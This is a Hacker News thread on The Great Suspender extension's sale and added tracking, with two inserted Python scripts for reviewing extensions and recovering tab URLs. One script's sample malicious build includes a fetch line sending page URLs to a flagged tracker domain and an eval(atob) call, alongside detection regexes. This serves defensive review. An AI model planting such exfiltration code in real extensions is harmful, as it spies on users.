from Hacker News

I no longer trust The Great Suspender

by davidfstr on 1/20/21, 2:01 PM with 371 comments

  • by fancy_pantser on 1/20/21, 4:28 PM

    As the developer of a pretty popular "utility" browser extension, I've been shocked by the volume of email I get every week about it.

    On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".

    Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).

      We at [redacted] are considering purchasing the complete license and ownership of the extensions which have 50K+ active users, may I know if you would be interested in selling? If so, - what is your estimated price?
    
      Regarding the SDK monetization which we discussed earlier, as it is not distractive and is compatible with any other monetization. We have straightforward terms and provide support for your users agreement. Our partners generate 3-20 K USD monthly with our solution for the browser extensions.
    
      As a kind reminder, we are [redacted] — a reputable global peer-to-peer ethical proxy network. All our clients are big reputable companies, we authorize their business before providing any proxy plans. 
    
      Look forward to your further feedback and discussing further details of our financial proposal for your Software in a short Zoom call or here by emails.
    
    Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased. I worked with Apple on one similar thing for an extension and it caused such a huge jump in support and feature requests from users that I was overwhelmed, so I am not keen to do it again until I have more free time. They can't understand why I don't want to grow by tens of thousands of users a week, but I'm just one person and don't make money from it whatsoever.
  • by bijant on 1/20/21, 2:31 PM

    This is really Google's fault. They make it impossible to turn off automatic updates for Chrome extensions from their store. That would be kind-of-ok if they actually had a rigorous approval process. But they don't. The Chrome Web Store has become one of the prime vectors for malware. The only way to be safe is to exclusively download releases from the extension's GitHub repo and to manually install them.
  • by kburman on 1/20/21, 3:57 PM

    Here's a list of other extensions which have been recently flagged by the community for similar behaviour

    - Auto Refresh Premium, static.trckljanalytic.com

    - Stream Video Downloader, static.trckpath.com

    - Custom Feed for Facebook, api.trackized.com

    - Notifications for Instagram, pc.findanalytic.com

    - Flash Video Downloader, static.trackivation.com

    - Ratings Preview for YouTube, cdn.webtraanalytica.com

    Copied from https://github.com/greatsuspender/thegreatsuspender/issues/1...

  • by AlphaWeaver on 1/20/21, 3:01 PM

    Quick note about the workaround mentioned in this article - the suggestion to download the last known good version of the extension and sideload it is a good one, but it has some problems on Chrome.

    Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.

    One could argue this is for security, but this change was implemented around the same time that Google disabled the ability to self-host extensions that install into Chrome. Really this is a mechanism to shut out independent extension developers from any potential plausible third-party distribution method that doesn’t rely on the Chrome Web Store (which Google controls and aggressively moderates.)

    Use Firefox.

  • by Centigonal on 1/20/21, 2:23 PM

    More discussion on GitHub: https://github.com/greatsuspender/thegreatsuspender/issues/1...

    Quite similar to what happened to Nano Adblocker/Defender a few months ago.

  • by alyandon on 1/20/21, 2:39 PM

    The MS Edge dev channel has a basic form of tab suspending built into it now. Based on my non-rigorous testing it seems to actually save more memory than TGS ever did so I just removed the extension entirely.

    It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(

  • by imedadel on 1/20/21, 2:54 PM

    I recently switched to Auto Tab Discard.[1] It uses the browser's built-in tab suspending. It doesn't have all the features of TGS, though.

    Edit: OneTab[2] is also pretty good when you have lots of tabs open for research or work.

    [1]: https://github.com/rNeomy/auto-tab-discard

    [2]: https://www.one-tab.com/

  • by Androider on 1/20/21, 4:47 PM

    In Chrome, make sure you set your less frequently used extensions to run "On click" instead of "On all sites". Extensions -> extension details -> Site access.

    For dev tools and such, I set a whitelist of the sites they're allowed to run on, using that same extension details page. There's no need for your JSON formatter etc. to run on every single page you visit. Also speeds up browsing.

  • by brundolf on 1/20/21, 6:58 PM

    Among other things, this is why when people say "HN doesn't need a dark mode, just use an extension", that isn't a valid solution. For years now I've refused to install any extensions that aren't too-big-to-compromise (which in practice - for me - means AdBlock Plus and maybe React Dev Tools), and that should be everyone's policy. Any extension whose compromise wouldn't damage the reputation of a billion-dollar organization is simply too juicy of an attack vector.
  • by jancsika on 1/20/21, 4:04 PM

    > Disable analytics tracking by opening the extension options for The Great Suspender and checking the box “Automatic deactivation of any kind of tracking”.

    > Pray that the shady developer doesn’t issue a malicious update to The Great Suspender later. (There’s no sensible way to disable updates of an individual extension.)

    Does Debian ship packages for individual browser extensions?

    I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.

    On the other hand, all these app delivery systems are so damned pernicious and require constant vigilance. We may have arrived at a moment in time where this is actually a difficult decision:

    * pay somebody a living wage to burrow down into Debian's WoT bureaucracy and add at least a selection of this functionality without phoning home

    * continue playing the most tedious game of whackamole with a whackamole game that mines all our data in order to learn how best to beat all users at whackamole

  • by mkj on 1/20/21, 2:29 PM

    It seems auto-updating browser extensions are riskier than leaving them non-updated?
  • by skrowl on 1/20/21, 3:09 PM

    Just sent him this email:

    Saw your article via HN.

    As an easier permanent fix, just uninstall The Great Suspender and install Auto Tab Discard (https://add0n.com/tab-discard.html). It does the same thing.

    It's available on:

    Firefox - Auto Tab Discard – Get this Extension for Firefox (en-US) (https://addons.mozilla.org/en-US/firefox/addon/auto-tab-disc...)

    Edge - Auto Tab Discard - Microsoft Edge Addons (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)

    or even if you're still using Chrome - Auto Tab Discard - Chrome Web Store (https://chrome.google.com/webstore/detail/auto-tab-discard/j...)

  • by asadkn on 1/20/21, 3:04 PM

    I have always used The Great Discarder instead [1]

    It's by the same dev too but it uses Chrome's Native Tab Discarding feature and I found it way more efficient (at the time I started using it a few years ago - haven't compared recently).

    [1] https://chrome.google.com/webstore/detail/the-great-discarde...

  • by AQXt on 1/20/21, 3:27 PM

    > Apparently recent versions of this extension have been taken over by a shady anonymous entity...

    That's something that worries me, whenever I install a software with trusted privileges.

    Software companies can sell their products -- and user base -- to other companies without notice.

    And it can be even worse in the free software world: think about all the updates that happen when you type `apt-get|yum|brew|npm|pip update`. What are the odds of a single dependency being taken over by a shady anonymous entity?

  • by acdha on 1/20/21, 7:11 PM

    This is why I stopped using extensions in any browser years ago unless it came from a trusted company I pay directly (i.e. 1Password). The broken economic model means that the developers always have pressure to cash in on a popular extension and Google has set things up to make abuse fast and easy with automatic silent updates and their usual skimping on human review. By the time the news about TGS came out most users already had the next release installed.
  • by tyingq on 1/20/21, 3:10 PM

    I'm now curious how much money the original developer was paid to hand it over. I imagine he/she knew what the buyer's plan was.
  • by aitchnyu on 1/20/21, 5:51 PM

    Why didn't browsers start warning users when an extension updated after changing owners?
  • by twunde on 1/20/21, 6:37 PM

    For those interested in understanding the security of Chrome extensions, Duo introduced CRXcavator (https://crxcavator.io/) a while back, which does some risk scoring around permissions. It is Chrome-only, and it doesn't protect against this type of attack specifically, although you can look at the Potential External Communication section for possible issues.
  • by frob on 1/20/21, 5:44 PM

    Google Chrome now has tab grouping. In Beta, you can click on the group name and collapse the tabs. Based on their reload times, it seems chrome suspends the tabs in the background when you collapse the group.
  • by EGreg on 1/20/21, 2:34 PM

    And this is why we need to rethink how we do software distribution.

    Package managers are nice for the lazy, but then we get stuff like this:

    https://qz.com/646467/how-one-programmer-broke-the-internet-...

    Actually you might be pulling a bunch of malicious updates in 2-3 modules deep in your dependency tree anytime.

    As a society we should be moving away from a culture of “immediate” updates eg on Twitter etc. And go towards more “peer review” like in science. Otherwise we are putting responsibility on every individual to verify all sides of the story and get informed. They don’t and society gets more and more divided. Imagine if a scientist tweeted at 3am and half their followers instantly believed them. Or if an open source contributor’s pull request was instantly accepted and pulled overnight by everyone. That’s why USA and other countries are now so divided politically. Individual responsibility of 100% of the downstream nodes is strange to outsource responsibility to.

    I wrote about this back in 2012 predicting what would happen:

    https://magarshak.com/blog/?p=114

  • by MarioMan on 1/21/21, 5:15 PM

    There was a recent paper published at ACM CCS 2020 that attempts to identify malicious changes to extension updates. Might be worth a read.

    You’ve Changed: Detecting Malicious Browser Extensions through their Update Deltas

    https://dl.acm.org/doi/10.1145/3372297.3423343

  • by asgrdz on 1/21/21, 9:43 AM

    I disable automatic updates for all extensions, as well as personally reviewing the source of every extension before installation.

    The review doesn't take much time. What I look for:

      1. The manifest for what network endpoints the extension is allowed to call.
      2. Any URL in the code that is external to the extension.
      3. Any remote network function (fetch/XHR/links) and traceback to the call sites.
      4. Whether there is any obfuscated code or not.
    
    If anything found in those spots seems fishy / unclear, I don't install the extension.

    Takes a few minutes, but catches most of the threat vectors. Skimming the code also gives me a sense of what sort of developer is behind the extension. Some code clearly shows a developer cares about privacy and / or security, which unconsciously adds karma for that dev in my book.

    Like others above, I don't use many extensions, but those I use I have to trust.
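
The following is an added example, not code from the thread, from The Great Suspender, or from any of the extensions named above. It turns the four-point checklist in the comment above into a script: it reads an unpacked extension from a {path: text} map, pulls host patterns from the manifest (both the MV2 "permissions" list and the MV3 "host_permissions" list), collects every external URL and network call site with its line number, and flags the usual obfuscation markers. It also checks the collected domains against the tracker domains listed earlier in the thread, and its compare_versions function implements the update-delta idea from the CCS 2020 paper cited above by reporting only what a new build does that the old one did not. The two sample builds at the bottom are constructed for illustration; the tracker domain used in them is one from the thread's own list.

```python
"""Pre-install static review of an unpacked extension, plus an update delta.

Works over an in-memory {path: text} map so it runs offline; point it at a
directory by loading each file into that map.
"""
import json
import re
from urllib.parse import urlsplit

# Domains copied from the list of flagged extensions earlier in the thread.
KNOWN_TRACKERS = {
    "static.trckljanalytic.com", "static.trckpath.com", "api.trackized.com",
    "pc.findanalytic.com", "static.trackivation.com", "cdn.webtraanalytica.com",
}
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
# Primitives an extension can use to talk to a remote host.
NET_CALL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket|importScripts)\b")
# Cheap markers of packed or obfuscated code; each is a hint to read closer, not proof.
OBFUSCATION_RE = re.compile(
    r"\b(eval|unescape|atob)\s*\(|new\s+Function\s*\(|String\.fromCharCode|\\x[0-9a-fA-F]{2}")
MAX_SANE_LINE = 2000  # minified bundles have lines this long; hand-written code does not


def review_extension(files):
    """files: {relative_path: text}. Returns the four checklist findings plus tracker hits."""
    manifest = json.loads(files["manifest.json"])
    # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
    declared = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    hosts = [p for p in declared if "://" in p or p == "<all_urls>"]
    external, call_sites, obfuscation = set(), [], []
    for path, text in sorted(files.items()):
        if not path.endswith((".js", ".html")):
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            for url in URL_RE.findall(line):
                host = urlsplit(url).hostname
                if host:
                    external.add(host)
            if NET_CALL_RE.search(line):
                call_sites.append((path, lineno, line.strip()[:80]))
            if OBFUSCATION_RE.search(line) or len(line) > MAX_SANE_LINE:
                obfuscation.append((path, lineno))
    return {
        "hosts": sorted(hosts),
        "external_domains": sorted(external),
        "call_sites": call_sites,
        "obfuscation": obfuscation,
        "known_trackers": sorted(external & KNOWN_TRACKERS),
    }


def compare_versions(old_files, new_files):
    """Update-delta check: what does the new build do that the old one did not?"""
    before, after = review_extension(old_files), review_extension(new_files)

    def added(key):
        return sorted(set(after[key]) - set(before[key]))

    return {
        "new_hosts": added("hosts"),
        "new_external_domains": added("external_domains"),
        "new_trackers": added("known_trackers"),
        "call_site_delta": len(after["call_sites"]) - len(before["call_sites"]),
        "obfuscation_delta": len(after["obfuscation"]) - len(before["obfuscation"]),
    }


# Constructed sample: a clean build and a later build that adds a phone-home
# script. Neither is the real extension's code.
GOOD = {
    "manifest.json": json.dumps({
        "manifest_version": 2, "name": "Sample Suspender", "version": "1.0",
        "permissions": ["tabs", "storage", "<all_urls>"],
    }),
    "background.js": "chrome.tabs.onUpdated.addListener(function (id) {\n"
                     "  chrome.tabs.discard(id);\n});\n",
}
BAD = dict(GOOD)
BAD["manifest.json"] = json.dumps({
    "manifest_version": 2, "name": "Sample Suspender", "version": "1.1",
    "permissions": ["tabs", "storage", "<all_urls>", "https://api.trackized.com/*"],
})
BAD["analytics.js"] = (
    "var u = 'https://api.trackized.com/v1/collect';\n"
    "fetch(u, {method: 'POST', body: JSON.stringify({url: location.href})});\n"
    "eval(atob('dmFyIHggPSAxOw=='));\n"
)

if __name__ == "__main__":
    for key, value in review_extension(BAD).items():
        print(f"{key}: {value}")
    print("delta:", compare_versions(GOOD, BAD))
```

The delta report is the part worth keeping around: a version that suddenly declares a new host pattern, contacts a domain it never contacted before, or grows an eval call is exactly the change the "quiet sale" pattern produces, and it is far easier to spot in a diff of findings than by re-reading the whole extension after every update.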

  • by weakboi on 1/20/21, 5:06 PM

    Ironically, I tracked the real world identity of someone using stolen credit cards in my ecom site BECAUSE he posted a tutorial/how-to on YouTube showing the vulnerability tool (script kiddie), under his real name. SMH. This won't stop this information from being disseminated, but it may save some idiots from themselves.
  • by qwerty456127 on 1/20/21, 4:40 PM

    By the way, is there an extension (I'm interested in both Firefox and Chrome) which would force all the new (background) tabs to be created in the suspended state (like if you had opened them in background and then restarted the browser) and only start loading after you actually open them?
  • by dstick on 1/20/21, 7:54 PM

    More detailed information can be found here: https://github.com/greatsuspender/thegreatsuspender/issues/1...
  • by SiteRelEnby on 1/20/21, 2:33 PM

    Either the second or third time it lost all my tabs was when I stopped trusting it.
  • by orliesaurus on 1/20/21, 4:03 PM

    Lifehack: export your suspended tabs as a flat file through the interface, uninstall the add-on, then follow the downgrade as the blog suggests, at the end reimport your tabs from the flat file
  • by Aardwolf on 1/20/21, 2:42 PM

    Doesn't chrome already suspend background tabs without plugin? At least I'm unable to properly have browser games running unless they're in a visible tab.
  • by mtoddsmith on 1/20/21, 4:39 PM

    Seems there should be an extension which checks other extensions for nefarious activity or notifies you of the events that are mentioned in the article.
  • by StellarTabi on 1/20/21, 7:47 PM

    The lack of user control, lock files, granularity of controls over browser extensions has gone too far.
  • by nojito on 1/20/21, 3:56 PM

  • by albertgoeswoof on 1/20/21, 3:01 PM

    Or you can use https://www.one-tab.com/ or https://tab.bz for a similar-ish use case
  • by facorreia on 1/20/21, 10:24 PM

    That's why I don't trust Chrome extensions. There have been too many instances of a popular instance being taken over to run malware. I don't think Google's handling of these security issues has been adequate.
  • by nakodari on 1/20/21, 2:51 PM

    Thanks for this! I've been using this extension for a long time and just removed it today. Honestly, with Macbook Air M1 there is no need for suspending tabs any more because the battery life is amazing, so that also helps.
  • by bogomipz on 1/21/21, 4:13 AM

    Did anyone download the latest good version of The Great Suspender (7.1.6) from GitHub and load it as an unpacked extension per the article?

    Are there any potential downsides to this? I was also curious: how does loading it this way avoid updates?

  • by wintermutestwin on 1/20/21, 3:47 PM

    At this point, I would gladly pay good money for a browser that prevented ads and tracking, provided most of the standard plugin functionality oob and vetted the rest. This whole mess is a massive time suck.
  • by jonas_kgomo on 1/21/21, 1:55 AM

    I've been using Sidekick, it has done a lot for me in terms of substituting extensions like TGS. It has its own tool for tab grouping and sessions, plus adblock. It has been good for productivity
  • by jakobpb on 1/20/21, 6:54 PM

    Uh, just use Firefox. Problem solved for both functionality and security.
  • by mikhailfranco on 1/22/21, 2:53 AM

    Looks like the 'last known good' version 7.1.6 is now blocked by the TGS server.

    Workaround to reopen a page is just to cut'n'paste the original URL from a parameter at the end of the TGS URL.
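
An added example, not code from the thread or from the extension, for the two workarounds above: exporting the suspended tabs as a flat file and recovering each original URL from the parameter at the end of the suspended-page URL. The comment only says the original URL is "a parameter at the end"; this script assumes that parameter is named uri, that it sits in the URL fragment after the "#", and that it is the last one, so everything after "uri=" is taken verbatim rather than split on "&". Those three details are assumptions from reading suspended-page URLs, not facts stated in the thread. The extension id and page URLs in the sample export are constructed.

```python
"""Recover original page URLs from a flat export of suspended-tab URLs."""
import re
from urllib.parse import urlsplit

# Chrome extension ids are 32 letters a-p; the page path is deliberately not
# checked so a renamed or sideloaded build still matches.
SUSPENDED_RE = re.compile(r"^chrome-extension://[a-p]{32}/")
# Assumed: the original URL is carried as the last fragment parameter, "uri=".
MARKER_RE = re.compile(r"(?:^|&)uri=")


def recover_original(url):
    """Return the URL to reopen for one export line, or None if nothing safe was found."""
    candidate = url.strip()
    if SUSPENDED_RE.match(candidate):
        fragment = urlsplit(candidate).fragment
        match = MARKER_RE.search(fragment)
        if match is None:
            return None
        # Take everything after the marker verbatim: the original URL may itself
        # contain '&' or '#', so splitting the fragment on '&' would truncate it.
        candidate = fragment[match.end():]
    # Only http(s) targets get reopened; javascript:, data: or chrome-extension:
    # entries in an export file are noise at best and a trap at worst.
    return candidate if urlsplit(candidate).scheme in ("http", "https") else None


def recover_all(export_text):
    """Split an export into (recovered_urls, rejected_lines), preserving order."""
    recovered, rejected = [], []
    for line in export_text.splitlines():
        if not line.strip():
            continue
        target = recover_original(line)
        (recovered if target else rejected).append(target or line)
    return recovered, rejected


# Constructed sample export; the extension id and page URLs are made up.
SAMPLE_EXPORT = """\
chrome-extension://abcdefghijklmnopabcdefghijklmnop/suspended.html#ttl=Item&pos=0&uri=https://example.com/item?id=1
https://example.com/plain
chrome-extension://abcdefghijklmnopabcdefghijklmnop/suspended.html#ttl=Search&pos=120&uri=https://example.com/search?q=a&b=2#results
chrome-extension://abcdefghijklmnopabcdefghijklmnop/suspended.html#ttl=Bad&pos=0&uri=javascript:alert(1)
"""

if __name__ == "__main__":
    ok, bad = recover_all(SAMPLE_EXPORT)
    print("\n".join(ok))
    print("rejected:", bad)
```

The scheme check is the part that matters once the extension itself is no longer trusted: an export file is just text, and reopening every line of it blindly would also execute whatever non-http entries a build chose to write there.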

  • by vmception on 1/20/21, 3:26 PM

    Uninstalled and reported.
  • by AlexCoventry on 1/20/21, 5:12 PM

    Is there a tool which will automatically reload all your extensions from disk, as described in the OP? Seems like a sensible default, from a security perspective.
  • by TheRealPomax on 1/20/21, 3:58 PM

    Is there a reason this extension still exists, given that tabs get heavily deprioritized when not in focus, and have been for many, many versions now?
  • by mendelmaleh on 1/20/21, 4:29 PM

    I expected this to be about Jack Dorsey/twitter xD
  • by Paul-ish on 1/20/21, 6:58 PM

    I keep most of my extensions disabled most of the time. A lot of the extensions have particular uses and don't always need to be active.
  • by lanius on 1/20/21, 11:52 PM

    I'm glad I decided to go with 32 GB of RAM for my current PC build. No longer need to close any tabs!
  • by peanut_worm on 1/20/21, 2:50 PM

    Why do people keep 100s of tabs open at a time? I get irritated if I have more than 8 open.
  • by jeromeparadis on 1/20/21, 6:47 PM

    There's a reason why I don't install any extension except a password manager.
  • by MacroChip on 1/20/21, 8:27 PM

    Does this extension add functionality beyond Chrome's existing tab suspension?
  • by pjmlp on 1/20/21, 8:28 PM

    I just don't use extensions, so no need to worry about such scenarios.
  • by bugfix on 1/20/21, 6:08 PM

    Wow, my Chrome RAM usage went from about 2GB to 8GB after removing TGS.
  • by otterpro on 1/20/21, 3:23 PM

    Wow, this is why just recently my Macbook pro was registering high CPU usage even when all tabs were asleep using Great Suspender. For some reason, Chrome was registering high CPU usage, and I thought it was some Chrome bug.
  • by cwwc on 1/20/21, 3:17 PM

    Lifesaver. Much obliged, davidfstr.
  • by istorical on 1/20/21, 3:26 PM

    anyone able to compare Tiny Suspender and Auto Tab Discard?
  • by angryasian on 1/20/21, 9:11 PM

    there really needs to be a better bookmarking solution.
  • by iamspoilt on 1/20/21, 4:26 PM

    Uninstalled. Period.
  • by tra3 on 1/20/21, 2:50 PM

    A reddit link, from the blog post [0] has all the details for those who don't use chrome.

    TLDR: A popular extension was quietly sold off to an unknown party that subsequently added tracking/analytics. Not specifically malware, but not trustworthy either.

    Did I miss anything?

    [0]: https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...

  • by tus88 on 1/20/21, 6:22 PM

    "Shady" take-over of plugins/apps is just as big a suspicious fail as allowing apps to gain access to all contacts on mobile phones.

    Google never really cared about user privacy at all.